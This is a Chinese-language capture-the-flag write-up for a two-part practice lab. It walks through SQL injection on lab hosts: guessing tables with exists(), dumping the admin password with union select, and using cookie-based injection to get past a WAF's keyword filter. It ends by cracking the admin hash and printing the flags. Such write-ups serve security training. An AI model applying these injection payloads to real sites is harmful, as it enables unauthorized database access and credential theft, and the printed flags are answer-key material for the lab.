尤里的复仇Ⅰ 小芳！第一章：为了女神小芳！第二章：遇到阻难！绕过WAF过滤！

第一章：为了女神小芳！

SQL注入，判断字段数，判断回显点
这道题可以用exists函数合理猜测表单

and exists(select * from admin)#猜测有admin表单

http://59.63.200.79:8003/?id=1%20and%20exists(select%20*%20from%20admin)

继续猜是否有user，password字段，最后查具体数据

 and 1=2 union select 1,password from admin

http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,password%20from%20admin

密码即flag为hellohack

第二章：遇到阻难！绕过WAF过滤！

测试是否有注入点，弹框提示过滤了很多关键字

绕过WAF关键字过滤

判断是否存在cookie传参

把传参值删掉，按下F12刷新

http://59.63.200.79:8004/shownews.asp

添加名称和值刷新
改值为170再刷新

说明这个网站可以通过cookie传参

使用ModHeader插件进行cookie注入

Access数据库查询直接换到第一行不需要and 1=2显示后面数据
设置cookie：

设置Cookie

判断字段数：

id=171+order+by+10

前面的√打上，刷新页面

判断回显点：

id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

刷新可知回显点

查询具体数据：

id=171+union+select+1,2,3,4,5,6,username,password,9,10+from+admin

b9a2a2b5dffb918c

解码：
cmd5

welcome

可以用御剑查找登入后台：
http://59.63.200.79:8004/admin/login.asp
拿到flag:
zkz{welcome-control}

最后

以上就是要减肥酸奶为你收集整理的尤里的复仇Ⅰ 小芳！第一章：为了女神小芳！第二章：遇到阻难！绕过WAF过滤！的全部内容，希望文章能够帮你解决尤里的复仇Ⅰ 小芳！第一章：为了女神小芳！第二章：遇到阻难！绕过WAF过滤！所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。